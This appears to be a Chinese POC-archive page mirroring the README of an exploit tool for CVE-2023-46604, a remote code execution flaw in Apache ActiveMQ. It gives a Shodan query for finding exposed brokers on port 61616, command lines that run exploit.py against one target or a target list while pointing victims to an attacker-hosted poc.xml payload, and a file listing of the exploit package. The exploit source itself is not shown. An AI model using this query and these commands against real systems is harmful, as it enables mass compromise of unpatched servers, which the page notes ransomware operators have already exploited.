关联漏洞
标题:
Apache ActiveMQ 代码问题漏洞
(CVE-2023-46604)
描述:Apache ActiveMQ是美国阿帕奇(Apache)基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.15.16之前、5.16.7之前、5.17.6之前或5.18.3之前版本存在代码问题漏洞,该漏洞源于允许具有代理网络访问权限的远程攻击者通过操纵 OpenWire 协议中的序列化类类型来运行任意 shell 命令。
描述
Exploit for CVE-2023-46604
介绍
# CVE-2023-46604
Exploit for CVE-2023-46604
### This tool helps to exploit this vulnerability.
#### Shodan Query to find target:
```
product:"ActiveMQ" port:"61616"
```
#### Tools Usage:
```
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
```
## About this CVE:
CVE-2023-46604 is a critical remote code execution vulnerability in Apache ActiveMQ, an open-source message broker software. This vulnerability allows a remote attacker with network access to either a Java-based OpenWire broker or client to execute arbitrary shell commands. This is achieved by manipulating serialized class types in the OpenWire protocol, causing the broker to instantiate any class on the classpath. The vulnerability results from insecure deserialization within Apache ActiveMQ and has been exploited by attackers, including the HelloKitty ransomware family, to run ransomware binaries and fully compromise systems.
文件快照
[4.0K] /data/pocs/985c6e5e17122c9c737f22f940710b81ca0856e0
├── [3.1K] exploit.py
├── [ 667] poc.xml
└── [1010] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。